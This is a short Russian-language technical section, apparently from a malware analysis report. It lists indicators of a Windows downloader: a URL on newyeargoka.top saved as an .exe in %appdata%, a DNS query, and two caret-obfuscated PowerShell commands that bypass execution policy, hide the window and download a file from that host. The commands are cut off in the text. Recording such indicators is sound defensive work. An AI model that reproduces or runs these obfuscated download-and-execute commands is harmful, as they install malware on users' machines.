Техническая информация
- http://newyeargoka.top/read.php?f=0.dat как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /c "pOW^eRSHe^L^L.e^XE^ -^Exe^c^u^T^iO^NpOl^i^cy^ ^BYPa^s^S -No^pRO^f^iLE -W^I^ndoWS^ty^L^E^ Hid^dEn (^NeW-^O^BJ^EcT^ S^Y^S^teM^.nE^T.we^B^c^lIenT^)^.d^O^wN^LOA^dFI^LE('http://ne...
- DNS ASK ne###argoka.top
- '<SYSTEM32>\cmd.exe' /c "pOW^eRSHe^L^L.e^XE^ -^Exe^c^u^T^iO^NpOl^i^cy^ ^BYPa^s^S -No^pRO^f^iLE -W^I^ndoWS^ty^L^E^ Hid^dEn (^NeW-^O^BJ^EcT^ S^Y^S^teM^.nE^T.we^B^c^lIenT^)^.d^O^wN^LOA^dFI^LE('http://ne...' (со скрытым окном)